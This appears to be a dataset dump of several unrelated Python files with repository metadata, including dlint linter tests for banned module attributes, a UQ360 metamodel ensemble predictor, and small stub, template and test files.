        python_node = self.get_ast_node(python_string)
        linter = get_bad_module_attribute_use_implementation(illegal_module_attributes)
        linter.visit(python_node)
        result = linter.get_results()
        expected = [
            dlint.linters.base.Flake8Result(
                lineno=lineno,
                col_offset=col_offset,
                message=linter._error_tmpl
            )
            for lineno, col_offset in expected_positions
        ]
        assert result == expected

    def test_empty_code(self):
        self._assert_lint_results(
            """
            """,
            {'foo': ['bar']},
            []
        )

    def test_empty_illegal_module_attributes(self):
        self._assert_lint_results(
            """
            import os
            var = 'test'
            os.path.join(var)
            """,
            {},
            []
        )

    def test_module_attribute_usage(self):
        self._assert_lint_results(
            """
            import foo
            var = 'echo "TEST"'
            foo.bar(var)
            """,
            {'foo': ['bar']},
            [(6, 0)]
        )

    def test_module_attribute_as_usage(self):
        self._assert_lint_results(
            """
            import foo.bar as baz
            var = 'echo "TEST"'
            baz.qux(var)
            """,
            {'foo.bar': ['qux']},
            [(6, 0)]
        )

    def test_module_attribute_import_from_usage(self):
        self._assert_lint_results(
            """
            from foo import bar
            var = 'echo "TEST"'
            bar(var)
            """,
            {'foo': ['bar']},
            [(2, 0)]
        )

    def test_module_attribute_import_from_as_usage(self):
        self._assert_lint_results(
            """
            from foo.bar import baz as qux
            var = 'echo "TEST"'
            qux(var)
            """,
            {'foo.bar': ['baz']},
            [(2, 0)]
        )

    def test_module_attribute_from_wildcard_usage(self):
        self._assert_lint_results(
            """
            from foo import *
            var = 'echo "TEST"'
            bar(var)
            """,
            {'foo': ['bar']},
            [(6, 0)]
        )

    def test_multiple_bad_attributes_usage(self):
        self._assert_lint_results(
            """
            import foo
            var = 'echo "TEST"'
            foo.bar(var)
            foo.baz(var)
            """,
            {'foo': ['bar', 'baz']},
            [(6, 0), (7, 0)]
        )

    def test_multiple_bad_modules_usage(self):
        self._assert_lint_results(
            """
            import foo
            import baz
            var = 'echo "TEST"'
            foo.bar(var)
            baz.qux(var)
            """,
            {'foo': ['bar'], 'baz': ['qux']},
            [(7, 0), (8, 0)]
        )

    def test_multiple_module_depth_usage(self):
        self._assert_lint_results(
            """
            import foo.bar.baz
            var = 'echo "TEST"'
            foo.bar.baz.qux(var)
            """,
            {'foo.bar.baz': ['qux']},
            [(6, 0)]
        )

    def test_multiple_module_depth_from_usage(self):
        self._assert_lint_results(
            """
            from foo import bar
            var = 'echo "TEST"'
            bar.baz.qux(var)
            """,
            {'foo.bar.baz': ['qux']},
            [(6, 0)]
        )

    def test_no_module_attribute_usage(self):
        self._assert_lint_results(
            """
            import os
            var = 'test'
            os.path.join(var)
            """,
            {'foo': ['bar']},
            []
        )

    def test_bad_module_class_use(self):
        self._assert_lint_results(
            """
            import foo
            bar = foo.Bar()
            """,
            {'foo': ['Bar']},
            [(4, 6)]
        )

    def test_module_attribute_missing_import_usage(self):
        self._assert_lint_results(
            """
            import baz
            from qux import quine
            from . import xyz
            var = 'echo "TEST"'
            foo = None
            foo.bar(var)
            """,
            {'foo': ['bar']},
            []
        )

    def test_module_attribute_arbitrary_depth_usage_legacy(self):
        self._assert_lint_results(
            """
            import m1
            from m1 import m2
            from m1.m2 import m3
            from m1.m2.m3 import m4
            m1.m2.m3.m4.bad_attribute()
            m2.m3.m4.bad_attribute()
            m3.m4.bad_attribute()
            m4.bad_attribute()
            """,
            {
                'm1.m2.m3.m4': ['bad_attribute'],
                'm2.m3.m4': ['bad_attribute'],
                'm3.m4': ['bad_attribute'],
                'm4': ['bad_attribute'],
            },
            [(7, 0), (8, 0), (9, 0), (10, 0)]
        )

    def test_module_attribute_arbitrary_depth_usage_new(self):
        # Same snippet as the legacy test, but only the fully-qualified key
        # is declared illegal; all four usages must still be flagged.
        self._assert_lint_results(
            """
            import m1
            from m1 import m2
            from m1.m2 import m3
            from m1.m2.m3 import m4
            m1.m2.m3.m4.bad_attribute()
            m2.m3.m4.bad_attribute()
            m3.m4.bad_attribute()
            m4.bad_attribute()
            """,
            {
                'm1.m2.m3.m4': ['bad_attribute'],
            },
            [(7, 0), (8, 0), (9, 0), (10, 0)]
        )

    def test_module_attribute_arbitrary_import_depth_usage_new(self):
        python_strings = [
            """
            import m1
            m1.m2.m3.m4.bad_attribute()
            """,
            """
            import m1.m2
            m1.m2.m3.m4.bad_attribute()
            """,
            """
            import m1.m2.m3
            m1.m2.m3.m4.bad_attribute()
            """,
            """
            import m1.m2.m3.m4
            m1.m2.m3.m4.bad_attribute()
            """,
        ]
        for python_string in python_strings:
            self._assert_lint_results(
                python_string,
                {'m1.m2.m3.m4': ['bad_attribute']},
                [(3, 0)]
            )

    def test_module_attribute_arbitrary_import_as_depth_usage_new(self):
        python_strings = [
            """
            import m1 as alias
            alias.m2.m3.m4.bad_attribute()
            """,
            """
            import m1.m2 as alias
            alias.m3.m4.bad_attribute()
            """,
            """
            import m1.m2.m3 as alias
            alias.m4.bad_attribute()
            """,
            """
            import m1.m2.m3.m4 as alias
            alias.bad_attribute()
            """,
        ]
        for python_string in python_strings:
            self._assert_lint_results(
                python_string,
                {'m1.m2.m3.m4': ['bad_attribute']},
                [(3, 0)]
            )

    def test_module_attribute_arbitrary_from_import_as_depth_usage_new(self):
        python_strings = [
            """
            from m1 import m2 as alias
            alias.m3.m4.bad_attribute()
            """,
            """
            from m1.m2 import m3 as alias
            alias.m4.bad_attribute()
            """,
            """
            from m1.m2.m3 import m4 as alias
            alias.bad_attribute()
            """,
        ]
        for python_string in python_strings:
            self._assert_lint_results(
                python_string,
                {'m1.m2.m3.m4': ['bad_attribute']},
                [(3, 0)]
            )

    def test_module_attribute_arbitrary_from_import_wildcard_depth_usage_new(self):
        python_strings = [
            """
            from m1 import *
            m2.m3.m4.bad_attribute()
            """,
            """
            from m1.m2 import *
            m3.m4.bad_attribute()
            """,
            """
            from m1.m2.m3 import *
            m4.bad_attribute()
            """,
        ]
        for python_string in python_strings:
            self._assert_lint_results(
                python_string,
                {'m1.m2.m3.m4': ['bad_attribute']},
                [(3, 0)]
            )

    def test_module_attribute_usage_nested(self):
        self._assert_lint_results(
            """
            import foo
            var = 'echo "TEST"'
            foo.bar(var).baz()
            """,
            {'foo': ['bar']},
            [(6, 0)]
        )
if __name__ == "__main__":
unittest.main()
| 25.432348
| 90
| 0.496423
| 1,561
| 16,353
| 4.898142
| 0.063421
| 0.054931
| 0.0531
| 0.091551
| 0.914334
| 0.913942
| 0.906356
| 0.895762
| 0.870521
| 0.844755
| 0
| 0.022118
| 0.411117
| 16,353
| 642
| 91
| 25.471963
| 0.771859
| 0.001223
| 0
| 0.676471
| 0
| 0
| 0.027105
| 0
| 0
| 0
| 0
| 0
| 0.05615
| 1
| 0.061497
| false
| 0
| 0.029412
| 0.002674
| 0.106952
| 0.002674
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a18a577cbd51e975117b7ec1bc30711aca8a257a
| 143
|
py
|
Python
|
data-analysis-by-python/chapter4-2.py
|
matbird/StudyPy
|
3f822c823ecd4d2200f3aae2d1a69a0374914bf3
|
[
"Apache-2.0"
] | null | null | null |
data-analysis-by-python/chapter4-2.py
|
matbird/StudyPy
|
3f822c823ecd4d2200f3aae2d1a69a0374914bf3
|
[
"Apache-2.0"
] | null | null | null |
data-analysis-by-python/chapter4-2.py
|
matbird/StudyPy
|
3f822c823ecd4d2200f3aae2d1a69a0374914bf3
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from numpy.random import randn
from pandas import Series,DataFrame
import pandas as pd
# Script entry point guard; the chapter's example code has not been added yet.
if __name__ == '__main__':
    pass
| 17.875
| 35
| 0.769231
| 22
| 143
| 4.636364
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 143
| 8
| 36
| 17.875
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.166667
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
a1bb08b76c261aca0b62bc02b4e704f1655babdc
| 140
|
py
|
Python
|
{{cookiecutter.project_slug}}/{{cookiecutter.main_app}}/apps.py
|
huogerac/cookiecutter-djangofloppyforms
|
0a2c1d7fe506a5df13aaefde0f716373dbb8194e
|
[
"BSD-3-Clause"
] | 3
|
2021-03-29T19:11:30.000Z
|
2021-05-08T13:18:41.000Z
|
{{cookiecutter.project_slug}}/{{cookiecutter.main_app}}/apps.py
|
huogerac/cookiecutter-djangofloppyforms
|
0a2c1d7fe506a5df13aaefde0f716373dbb8194e
|
[
"BSD-3-Clause"
] | null | null | null |
{{cookiecutter.project_slug}}/{{cookiecutter.main_app}}/apps.py
|
huogerac/cookiecutter-djangofloppyforms
|
0a2c1d7fe506a5df13aaefde0f716373dbb8194e
|
[
"BSD-3-Clause"
] | 2
|
2021-03-12T15:13:38.000Z
|
2021-07-01T19:38:11.000Z
|
from django.apps import AppConfig
class {{ cookiecutter.main_app|capitalize }}Config(AppConfig):
name = '{{ cookiecutter.main_app }}'
| 23.333333
| 62
| 0.735714
| 16
| 140
| 6.3125
| 0.75
| 0.316832
| 0.376238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135714
| 140
| 5
| 63
| 28
| 0.834711
| 0
| 0
| 0
| 0
| 0
| 0.192857
| 0.15
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a1cd9c36c94a33abde9b9407040c70844d22a358
| 158
|
py
|
Python
|
util/test/tests/GL/GL_Buffer_Truncation.py
|
PLohrmannAMD/renderdoc
|
ea16d31aa340581f5e505e0c734a8468e5d3d47f
|
[
"MIT"
] | 6,181
|
2015-01-07T11:49:11.000Z
|
2022-03-31T21:46:55.000Z
|
util/test/tests/GL/GL_Buffer_Truncation.py
|
PLohrmannAMD/renderdoc
|
ea16d31aa340581f5e505e0c734a8468e5d3d47f
|
[
"MIT"
] | 2,015
|
2015-01-16T01:45:25.000Z
|
2022-03-25T12:01:06.000Z
|
util/test/tests/GL/GL_Buffer_Truncation.py
|
PLohrmannAMD/renderdoc
|
ea16d31aa340581f5e505e0c734a8468e5d3d47f
|
[
"MIT"
] | 1,088
|
2015-01-06T08:36:25.000Z
|
2022-03-30T03:31:21.000Z
|
import rdtest
import renderdoc as rd
class GL_Buffer_Truncation(rdtest.Buffer_Truncation):
demos_test_name = 'GL_Buffer_Truncation'
internal = False
| 22.571429
| 53
| 0.803797
| 21
| 158
| 5.714286
| 0.666667
| 0.4
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14557
| 158
| 7
| 54
| 22.571429
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.125786
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
629a9240d857ed3ad7105763a0a21438f33252ca
| 34
|
py
|
Python
|
Hello.py
|
FlorinCostin81/session1
|
72238b217a78b5c1d5dff8cbe57cf541dce13915
|
[
"MIT"
] | null | null | null |
Hello.py
|
FlorinCostin81/session1
|
72238b217a78b5c1d5dff8cbe57cf541dce13915
|
[
"MIT"
] | null | null | null |
Hello.py
|
FlorinCostin81/session1
|
72238b217a78b5c1d5dff8cbe57cf541dce13915
|
[
"MIT"
] | null | null | null |
print("Hello world khsdldsjslw!")
| 17
| 33
| 0.764706
| 4
| 34
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 2
| 33
| 17
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
62cc561445256bd2409e4ceaf65687cd188f6fa2
| 19,137
|
py
|
Python
|
uq360/algorithms/blackbox_metamodel/predictors/core/short_text.py
|
Sclare87/UQ360
|
2378bfa4a8d61f813afbf6854341888434c9eb11
|
[
"Apache-2.0"
] | 148
|
2021-05-27T20:52:51.000Z
|
2022-03-16T22:49:48.000Z
|
uq360/algorithms/blackbox_metamodel/predictors/core/short_text.py
|
Sclare87/UQ360
|
2378bfa4a8d61f813afbf6854341888434c9eb11
|
[
"Apache-2.0"
] | 9
|
2021-06-21T18:45:07.000Z
|
2021-11-08T14:42:30.000Z
|
uq360/algorithms/blackbox_metamodel/predictors/core/short_text.py
|
Sclare87/UQ360
|
2378bfa4a8d61f813afbf6854341888434c9eb11
|
[
"Apache-2.0"
] | 27
|
2021-06-01T18:29:02.000Z
|
2022-03-02T06:56:03.000Z
|
# Licensed Materials - Property of IBM
#
# 95992503
#
# (C) Copyright IBM Corp. 2019, 2020 All Rights Reserved.
#
from collections import Counter
import sys
import numpy as np
from sklearn.model_selection import StratifiedKFold, train_test_split
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
from uq360.algorithms.blackbox_metamodel.predictors.base.predictor_base import PerfPredictor
from uq360.utils.hpo_search import CustomRandomSearch
from uq360.utils.calibrators.calibrator import Calibrator
import logging
# import numpy as np
# from sklearn.model_selection import StratifiedKFold, train_test_split
# from sklearn.ensemble import GradientBoostingClassifier
# from sklearn.neural_network import MLPClassifier
# from sklearn.svm import SVC
# from .performance_predictor import PerfPredictor
# from ..hpo_search import CustomRandomSearch
# from ..calibrators.calibrator import Calibrator
import logging
logger = logging.getLogger(__name__)
"""
Performance predictor for short text data. It is based on an ensemble of meta-models:
one mlp metamodel, one GBM metamodel, and one SVM metamodel. This performance predictor does not have a method
to quantify its own uncertainty, so the uncertainty values are zero.
"""
class TextEnsemblePredictor(PerfPredictor):
def __init__(self, calibrator="shift"):
self.metamodels_considered = ["svm", "gbm", "mlp"]
self.metamodels = {}
self.metamodel_calibrators = {}
self.return_all_true = False
self.return_all_false = False
self.x_test = None
self.y_test = None
self.random_state = 42
self._object_registry = {}
self.fit_status = False
# A dictionary to stash any whitebox features the prediction has that can be used in the uncertainty model
self.whitebox_features = {}
logger.info("Calibrator: %s", calibrator)
if calibrator is None:
self.metamodel_calibrators = None
else:
for metamodel in self.metamodels_considered:
self.metamodel_calibrators[metamodel] = Calibrator.instance(calibrator)
@classmethod
def name(cls):
return ('text_ensemble')
def fit(self, x_test_unprocessed, x_test, y_test):
self.x_test = x_test
self.y_test = y_test
x_test = x_test.values
# Don't split off test set for calibration if calibrator = None
if self.metamodel_calibrators is not None:
try:
x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test,
test_size=0.25,
stratify=y_test,
random_state=self.random_state)
except Exception as e:
# sometimes it may not be possible to stratify - when all the predictors are correct or incorrect.
# fall back to regular train test split and these conditions will be handled downstream
x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test, test_size=0.2,
random_state=self.random_state)
else:
x_dev = x_test
y_dev = y_test
if len(np.unique(y_dev)) == 1:
if 1 in y_dev:
self.return_all_true = True
print(
'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
self.fit_status = True
return
else:
self.return_all_false = True
print(
'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
self.fit_status = True
return
# Balance datasets
x_dev, y_dev = self._balance_data(x_dev, y_dev)
mlp_parameters = {
"hidden_layer_sizes": [(100,),
(100, 100, 100,),
(300, 300,),
(400, 300, 200, 100,)],
"activation": ['logistic', 'relu'],
"early_stopping": [True],
"learning_rate": ['constant', 'adaptive'],
"alpha": [0.00001, 0.0001, 0.001]
}
svm_parameters = {
'C': [0.1, 1, 10, 100, 1000],
'gamma': [1, 0.1, 0.01, 0.001, 0.0001],
'kernel': ['rbf', 'linear', 'poly','sigmoid']
}
gbm_parameters = {
"loss": ["deviance"],
"learning_rate": [0.1, 0.15, 0.2],
"min_samples_split": np.linspace(0.005, 0.01, 5),
"min_samples_leaf": np.linspace(0.0005, 0.001, 5),
"max_leaf_nodes": list(range(3, 12, 2)),
"max_features": ["log2", "sqrt"],
"subsample": np.linspace(0.3, 0.9, 6),
"n_estimators": range(100, 401, 50)
}
randomized_params = {
"n_iter": 20,
"scoring": "f1",
"n_jobs": -1,
"cv": StratifiedKFold(n_splits=3, shuffle=True),
"verbose": 0,
"return_train_score": True,
"progress_bar": False,
"random_state": self.random_state}
classifier1 = GradientBoostingClassifier()
gbm_classifier = CustomRandomSearch(classifier1, gbm_parameters, **randomized_params)
gbm = None
if 'gbm' in self.metamodels_considered:
gbm_classifier.fit(x_dev, y_dev)
gbm = gbm_classifier.best_estimator_
self.metamodels["gbm"] = gbm
logger.info("Building GBM Model is complete")
classifier2 = MLPClassifier()
mlp_classifier = CustomRandomSearch(classifier2, mlp_parameters, **randomized_params)
mlp = None
if 'mlp' in self.metamodels_considered:
mlp_classifier.fit(x_dev, y_dev)
mlp = mlp_classifier.best_estimator_
self.metamodels["mlp"] = mlp
logger.info("Building MLP Model is complete")
classifier3 = SVC(probability=True,max_iter=10000)
svm_classifier = CustomRandomSearch(classifier3, svm_parameters, **randomized_params)
svm = None
if 'svm' in self.metamodels_considered:
svm_classifier.fit(x_dev, y_dev)
svm = svm_classifier.best_estimator_
logger.info("Building SVM Model is complete")
self.metamodels["svm"] = svm
# If calibrator is not None, fit
if self.metamodel_calibrators is not None:
if len(np.unique(y_test)) == 1:
if 1 in y_test:
self.return_all_true = True
print(
'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
self.fit_status = True
return
else:
self.return_all_false = True
print(
'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
self.fit_status = True
return
logger.info("Metamodels considered %s", self.metamodels_considered)
for mm in self.metamodels_considered:
model = self.metamodels[mm]
preds = model.predict_proba(x_test)
preds = preds[:, 1]
self.metamodel_calibrators[mm].fit(preds, y_test)
self.fit_status = True
def predict(self, X_unprocessed, X):
X = X.values
assert self.fit_status
if self.return_all_true:
preds = 0.99999999 * np.ones(X.shape[0])
output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
return output
if self.return_all_false:
preds = 0 * np.ones(X.shape[0])
output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
return output
confidences = []
for mm in self.metamodels_considered:
logger.info("Predicting against metamodel %s", mm)
model = self.metamodels[mm]
preds = model.predict_proba(X)
preds = preds[:, 1]
if self.metamodel_calibrators:
out = self.metamodel_calibrators[mm].predict(preds)
out = list(map(lambda x: 0 if x < 0 else x, out))
out = list(map(lambda x: 1 if x > 1 else x, out))
confidences.append(out)
else:
confidences.append(preds)
preds = confidences
confidences = np.maximum(np.mean(preds, axis=0), 0.0)
output = {'confidences': confidences, 'uncertainties': np.zeros(confidences.shape)}
return output
def save(self, output_location):
pass
def load(self, input_location):
pass
#
#
# import numpy as np
# from sklearn.model_selection import StratifiedKFold, train_test_split
# from sklearn.ensemble import GradientBoostingClassifier
# from sklearn.neural_network import MLPClassifier
# from sklearn.svm import SVC
# from uq360.algorithms.blackbox_metamodel.predictors.base.predictor_base import PerfPredictor
# from uq360.utils.hpo_search import CustomRandomSearch
# from uq360.utils.calibrators.calibrator import Calibrator
# import logging
#
# logger = logging.getLogger(__name__)
#
# """
# This version of the text ensemble predictor does an "inner" and "outer calibration".
# Note: For calibration, we just set aside one small subset of data and reuse it for inner and outer calibration
#
# Logic:
# fit()
# Take every meta model, create a calib object per meta model (N objects). predict against the meta model and fit() one calibrator per meta model. (inner calib)
# As you create one calib per metamodel, save the predictions and obtain the mean confidences. Use this to fit a "master calibrator" (outer calib)
#
# predict()
# obtain confidences against every single meta model. pass the confidences to the calibrator's predict().
# grab the mean of confidences that come from N calibrators (inner calib)
# pass the mean of confidences to the "master calibrator" and predict() again. (outer calib)
#
# """
#
#
# class TextEnsembleV2Predictor(PerfPredictor):
#
# def __init__(self, calibrator="isotonic_regression"):
# self.metamodels_considered = ["svm", "gbm", "mlp"]
# self.metamodels = {}
# self.metamodel_calibrators = {}
#
# self.return_all_true = False
# self.return_all_false = False
# self.x_test = None
# self.y_test = None
# self.random_state = 42
# self._object_registry = {}
# self.fit_status = False
#
# # A dictionary to stash any whitebox features the prediction has that can be used in the uncertainty model
# self.whitebox_features = {}
#
# logger.info("Calibrator: %s", calibrator)
# if calibrator is None:
# self.metamodel_calibrators = None
# else:
# for metamodel in self.metamodels_considered:
# self.metamodel_calibrators[metamodel] = Calibrator.instance(calibrator)
#
# if calibrator is None:
# self.calibrator = None
# else:
# self.calibrator = Calibrator.instance(calibrator)
#
# @classmethod
# def name(cls):
# return ('text_ensemble')
#
# def fit(self, x_test_unprocessed, x_test, y_test):
# self.x_test = x_test
# self.y_test = y_test
#
# x_test = x_test.values
#
# # Don't split off test set for calibration if calibrator = None
# if self.metamodel_calibrators is not None:
# try:
# x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test,
# test_size=0.25,
# stratify=y_test,
# random_state=self.random_state)
#
# except Exception as e:
# # sometimes it may not be possible to stratify - when all the predictors are correct or incorrect.
# # fall back to regular train test split and these conditions will be handled downstream
# x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test, test_size=0.2,
# random_state=self.random_state)
# else:
# x_dev = x_test
# y_dev = y_test
#
# if len(np.unique(y_dev)) == 1:
# if 1 in y_dev:
# self.return_all_true = True
# print(
# 'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
# self.fit_status = True
# return
# else:
# self.return_all_false = True
# print(
# 'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
# self.fit_status = True
# return
# # Balance datasets
# x_dev, y_dev = self._balance_data(x_dev, y_dev)
# mlp_parameters = {
# "hidden_layer_sizes": [(100,),
# (100, 100, 100,),
# (300, 300,),
# (400, 300, 200, 100,)],
# "activation": ['logistic', 'relu'],
# "early_stopping": [True],
# "learning_rate": ['constant', 'adaptive'],
# "alpha": [0.00001, 0.0001, 0.001]
# }
#
# svm_parameters = {
# 'C': [0.1, 1, 10, 100, 1000],
# 'gamma': [1, 0.1, 0.01, 0.001, 0.0001],
# 'kernel': ['rbf', 'linear', 'poly', 'sigmoid']
# }
#
# gbm_parameters = {
# "loss": ["deviance"],
# "learning_rate": [0.1, 0.15, 0.2],
# "min_samples_split": np.linspace(0.005, 0.01, 5),
# "min_samples_leaf": np.linspace(0.0005, 0.001, 5),
# "max_leaf_nodes": list(range(3, 12, 2)),
# "max_features": ["log2", "sqrt"],
# "subsample": np.linspace(0.3, 0.9, 6),
# "n_estimators": range(100, 401, 50)
# }
#
# randomized_params = {
# "n_iter": 20,
# "scoring": "f1",
# "n_jobs": -1,
# "cv": StratifiedKFold(n_splits=3, shuffle=True),
# "verbose": 0,
# "return_train_score": True,
# "progress_bar": False,
# "random_state": self.random_state}
# classifier1 = GradientBoostingClassifier()
# gbm_classifier = CustomRandomSearch(classifier1, gbm_parameters, **randomized_params)
#
# gbm = None
#
# if 'gbm' in self.metamodels_considered:
# gbm_classifier.fit(x_dev, y_dev)
# gbm = gbm_classifier.best_estimator_
# self.metamodels["gbm"] = gbm
# logger.info("Building GBM Model is complete")
#
# classifier2 = MLPClassifier()
# mlp_classifier = CustomRandomSearch(classifier2, mlp_parameters, **randomized_params)
#
# mlp = None
#
# if 'mlp' in self.metamodels_considered:
# mlp_classifier.fit(x_dev, y_dev)
# mlp = mlp_classifier.best_estimator_
#
# self.metamodels["mlp"] = mlp
# logger.info("Building MLP Model is complete")
#
# classifier3 = SVC(probability=True, max_iter=10000)
# svm_classifier = CustomRandomSearch(classifier3, svm_parameters, **randomized_params)
# svm = None
#
# if 'svm' in self.metamodels_considered:
# svm_classifier.fit(x_dev, y_dev)
# svm = svm_classifier.best_estimator_
#
# logger.info("Building SVM Model is complete")
# self.metamodels["svm"] = svm
#
# meta_preds = []
# # If calibrator is not None, fit
# if self.metamodel_calibrators is not None:
# if len(np.unique(y_test)) == 1:
# if 1 in y_test:
# self.return_all_true = True
# print(
# 'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
# self.fit_status = True
# return
# else:
# self.return_all_false = True
# print(
# 'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
# self.fit_status = True
# return
#
# logger.info("Metamodels considered %s", self.metamodels_considered)
# for mm in self.metamodels_considered:
# model = self.metamodels[mm]
# preds = model.predict_proba(x_test)
#
# meta_preds.append(preds)
# preds = preds[:, 1]
# self.metamodel_calibrators[mm].fit(preds, y_test)
#
# meta_preds = np.asarray(meta_preds)
# meta_preds = np.mean(meta_preds, axis=0)
# meta_preds = meta_preds[:, 1]
#
# self.calibrator.fit(meta_preds, y_test)
#
# self.fit_status = True
#
# def predict(self, X_unprocessed, X):
# X = X.values
# assert self.fit_status
# if self.return_all_true:
# preds = 0.99999999 * np.ones(X.shape[0])
# output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
# return output
#
# if self.return_all_false:
# preds = 0 * np.ones(X.shape[0])
# output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
# return output
#
# confidences = []
# for mm in self.metamodels_considered:
# logger.info("Predicting against metamodel %s", mm)
# model = self.metamodels[mm]
# preds = model.predict_proba(X)
# preds = preds[:, 1]
#
# if self.metamodel_calibrators:
# out = self.metamodel_calibrators[mm].predict(preds)
# confidences.append(out)
# else:
# confidences.append(preds)
#
# preds = confidences
# confidences = np.mean(preds, axis=1)
#
# if self.calibrator is not None:
# confidences = self.calibrator.predict(confidences)
#
# output = {'confidences': confidences, 'uncertainties': np.zeros(confidences.shape)}
# return output
#
# def save(self, output_location):
# pass
#
# def load(self, input_location):
# pass
| 38.350701
| 160
| 0.567174
| 2,158
| 19,137
| 4.86608
| 0.139481
| 0.03733
| 0.036568
| 0.029711
| 0.870108
| 0.856871
| 0.854776
| 0.854776
| 0.854776
| 0.854776
| 0
| 0.030814
| 0.336939
| 19,137
| 498
| 161
| 38.427711
| 0.796753
| 0.538172
| 0
| 0.255682
| 0
| 0
| 0.11791
| 0
| 0
| 0
| 0
| 0
| 0.005682
| 1
| 0.034091
| false
| 0.011364
| 0.068182
| 0.005682
| 0.153409
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
62d2b230640f3a1dfc2a65dba72fff893c6bf771
| 35
|
py
|
Python
|
UPGL/windows/__init__.py
|
DillonEnge/UPGL
|
a4ed766b689d1a231f4ef51169beebb4f11adfd7
|
[
"MIT"
] | null | null | null |
UPGL/windows/__init__.py
|
DillonEnge/UPGL
|
a4ed766b689d1a231f4ef51169beebb4f11adfd7
|
[
"MIT"
] | null | null | null |
UPGL/windows/__init__.py
|
DillonEnge/UPGL
|
a4ed766b689d1a231f4ef51169beebb4f11adfd7
|
[
"MIT"
] | null | null | null |
from .example import ExampleWindow
| 17.5
| 34
| 0.857143
| 4
| 35
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a7df1fa818ec8e601e14f01067e39937e97b1aec
| 95
|
py
|
Python
|
happy_config/param_tuning/__init__.py
|
GraphCL/happy_config
|
2e1accb6161b9e8ee2a7fd9359b9155e915a075b
|
[
"MIT"
] | 1
|
2022-03-07T13:56:27.000Z
|
2022-03-07T13:56:27.000Z
|
happy_config/param_tuning/__init__.py
|
GraphCL/happy_config
|
2e1accb6161b9e8ee2a7fd9359b9155e915a075b
|
[
"MIT"
] | null | null | null |
happy_config/param_tuning/__init__.py
|
GraphCL/happy_config
|
2e1accb6161b9e8ee2a7fd9359b9155e915a075b
|
[
